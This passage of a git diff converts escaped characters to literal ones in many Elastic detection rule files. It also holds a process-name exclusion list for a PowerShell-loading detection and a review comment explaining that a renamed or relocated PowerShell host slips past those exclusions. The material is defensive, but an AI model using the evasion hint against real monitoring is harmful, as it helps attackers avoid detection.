\"msiexec.exe\",\n \"MsiExec.exe\",\n \"noderunner.exe\",\n 
\"NServiceBus.Host.exe\",\n \"NServiceBus.Host32.exe\",\n \"NServiceBus.Hosting.Azure.HostProcess.exe\",\n \"OuiGui.WPF.exe\",\n \"powershell.exe\",\n \"powershell_ise.exe\",\n \"pwsh.exe\",\n \"SCCMCliCtrWPF.exe\",\n \"ScriptEditor.exe\",\n \"ScriptRunner.exe\",\n \"sdiagnhost.exe\",\n \"servermanager.exe\",\n \"setup100.exe\",\n \"ServiceHub.VSDetouredHost.exe\",\n \"SPCAF.Client.exe\",\n \"SPCAF.SettingsEditor.exe\",\n \"SQLPS.exe\",\n \"Ssms.exe\",\n \"telemetryservice.exe\",\n \"UMWorkerProcess.exe\",\n \"w3wp.exe\",\n \"wsmprovhost.exe\"\n )\n", "related_integrations": [ { @@ -65,7 +65,7 @@ ], "risk_score": 47, "rule_id": "852c1f19-68e8-43a6-9dce-340771fe1be3", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
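Review bot: The new `setup` text on the + line of the @@ -65 hunk tells operators that PowerShell Script Block Logging must be enabled, but the rule's `query` (context in the @@ -14 hunk) keys on `event.category : ("library", "driver")` / `event.action : "Image loaded*"` and on `dll.name` / `file.name` matching `System.Management.Automation.dll`, so script block logging does not feed this detection and the prerequisite appears to have been carried over from a different rule; if these archived revisions are going to be touched at all, the setup should describe the image-load event source the query reads rather than presenting script block logging as a requirement. The same line keeps the doubled word in `Steps to implement the logging policy with with Advanced Audit Configuration:`, which should read `Steps to implement the logging policy with Advanced Audit Configuration:`. Separately, the unchanged exclusions `not process.executable regex~ """C:\\Program Files( \(x86\))?\\*\.exe"""` and the `not process.name : (...)` allowlist suppress any executable under Program Files and any process whose file name matches the list (which includes proxy-execution hosts such as `InstallUtil.exe`, `msiexec.exe` and `mmc.exe`), so a PowerShell host dropped into a writable vendor directory or renamed to one of those names will not alert; that is worth stating in the `note` so operators do not treat the exclusions as safe by construction. The enclosing JSON object continues outside the hunks shown.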
diff --git a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_107.json b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_107.json index 8fa670e6553..65a147a4914 100644 --- a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_107.json +++ b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_107.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_108.json b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_108.json index da5543dd908..aefa5ce3023 100644 --- a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_108.json +++ b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_108.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_208.json b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_208.json index 2f820c1e78c..8fca4744ff1 100644 --- a/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_208.json +++ b/packages/security_detection_engine/kibana/security_rule/852c1f19-68e8-43a6-9dce-340771fe1be3_208.json @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 
diff --git a/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_102.json b/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_102.json index 827ba9e8ea1..88c4f7721db 100644 --- a/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_102.json +++ b/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_102.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_103.json b/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_103.json index fa93949dc80..5fa8857591a 100644 --- a/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_103.json +++ b/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_103.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_104.json b/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_104.json index 2a9766cbd7d..b04a1716bea 100644 --- a/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_104.json +++ b/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_104.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_205.json b/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_205.json index 27658ffb27f..2331f44dd3a 100644 --- a/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_205.json +++ b/packages/security_detection_engine/kibana/security_rule/8623535c-1e17-44e1-aa97-7a0699c3037d_205.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_102.json b/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_102.json index da69d2c4b4a..3f5c0f47fd5 100644 --- a/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_102.json +++ b/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_103.json b/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_103.json index 5c65ce55bf6..2895420ad2a 100644 --- a/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_103.json +++ b/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", 
diff --git a/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_104.json b/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_104.json index 80880e5e237..b7a709a267e 100644 --- a/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_104.json +++ b/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_205.json b/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_205.json index 7839019ab8d..2a05904c63e 100644 --- a/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_205.json +++ b/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_205.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_102.json b/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_102.json index 95bb398d4a7..3f4ecb0cc9e 100644 --- a/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_102.json +++ b/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", 
diff --git a/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_103.json b/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_103.json index 386d2a526d7..2e266d76892 100644 --- a/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_103.json +++ b/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_103.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_104.json b/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_104.json index e6fa962f213..5d3f3eab835 100644 --- a/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_104.json +++ b/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_104.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_205.json b/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_205.json index 839525d4b66..a8ee335b1f8 100644 --- a/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_205.json +++ b/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_205.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", 
diff --git a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_103.json b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_103.json index 67ac3c5acb7..28f9bbc68e3 100644 --- a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_103.json +++ b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_103.json @@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "870aecc0-cea4-4110-af3f-e02e9b373655", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_104.json b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_104.json index 75d2d2b0431..6d840527740 100644 --- a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_104.json +++ b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_104.json 
@@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "870aecc0-cea4-4110-af3f-e02e9b373655", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_105.json b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_105.json index b4cbb27e3fe..df55c4ccc65 100644 --- a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_105.json +++ b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_105.json 
@@ -52,7 +52,7 @@ ], "risk_score": 47, "rule_id": "870aecc0-cea4-4110-af3f-e02e9b373655", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_106.json b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_106.json index 6e8183394d4..b98120752c7 100644 --- a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_106.json +++ b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_106.json 
@@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "870aecc0-cea4-4110-af3f-e02e9b373655", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_107.json b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_107.json index 17f67ae0946..15c14d75988 100644 --- a/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_107.json +++ b/packages/security_detection_engine/kibana/security_rule/870aecc0-cea4-4110-af3f-e02e9b373655_107.json 
@@ -62,7 +62,7 @@ ], "risk_score": 47, "rule_id": "870aecc0-cea4-4110-af3f-e02e9b373655", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -75,7 +75,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_105.json b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_105.json index ee58813e6b4..eb73b939a02 100644 --- a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_105.json 
@@ -60,7 +60,7 @@ ], "risk_score": 21, "rule_id": "871ea072-1b71-4def-b016-6278b505138d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_106.json b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_106.json index 57864f85ddf..b40cc14967d 100644 --- a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_106.json +++ b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_106.json 
@@ -60,7 +60,7 @@ ], "risk_score": 21, "rule_id": "871ea072-1b71-4def-b016-6278b505138d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_107.json b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_107.json index 2bca9ba45d9..e9067cbd62b 100644 --- a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_107.json +++ b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_107.json 
@@ -60,7 +60,7 @@ ], "risk_score": 21, "rule_id": "871ea072-1b71-4def-b016-6278b505138d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_108.json b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_108.json index e7314b5db5d..b1d412bb682 100644 --- a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_108.json +++ b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_108.json 
@@ -65,7 +65,7 @@ ], "risk_score": 21, "rule_id": "871ea072-1b71-4def-b016-6278b505138d", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_109.json b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_109.json index 327a66ce9ac..33093cdf82d 100644 --- a/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_109.json +++ b/packages/security_detection_engine/kibana/security_rule/871ea072-1b71-4def-b016-6278b505138d_109.json 
@@ -65,7 +65,7 @@ ], "risk_score": 21, "rule_id": "871ea072-1b71-4def-b016-6278b505138d", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_102.json b/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_102.json index 33d7211bd10..d96a1936016 100644 --- a/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_102.json +++ b/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_102.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", 
diff --git a/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_103.json b/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_103.json index 8b8582f6b8c..ae9ed85cc5a 100644 --- a/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_103.json +++ b/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_103.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_104.json b/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_104.json index f505978cbc1..ad6c1abac00 100644 --- a/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_104.json +++ b/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_104.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_205.json b/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_205.json index 4e9794f596e..af76b824ade 100644 --- a/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_205.json +++ b/packages/security_detection_engine/kibana/security_rule/87594192-4539-4bc4-8543-23bc3d5bd2b4_205.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", 
diff --git a/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_1.json b/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_1.json index 05e18214922..30455707f68 100644 --- a/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_1.json +++ b/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_1.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_2.json b/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_2.json index c807dc31751..69b7002b662 100644 --- a/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_2.json +++ b/packages/security_detection_engine/kibana/security_rule/884e87cc-c67b-4c90-a4ed-e1e24a940c82_2.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_101.json b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_101.json index d84308622cd..3934ce3dc31 100644 --- a/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_101.json 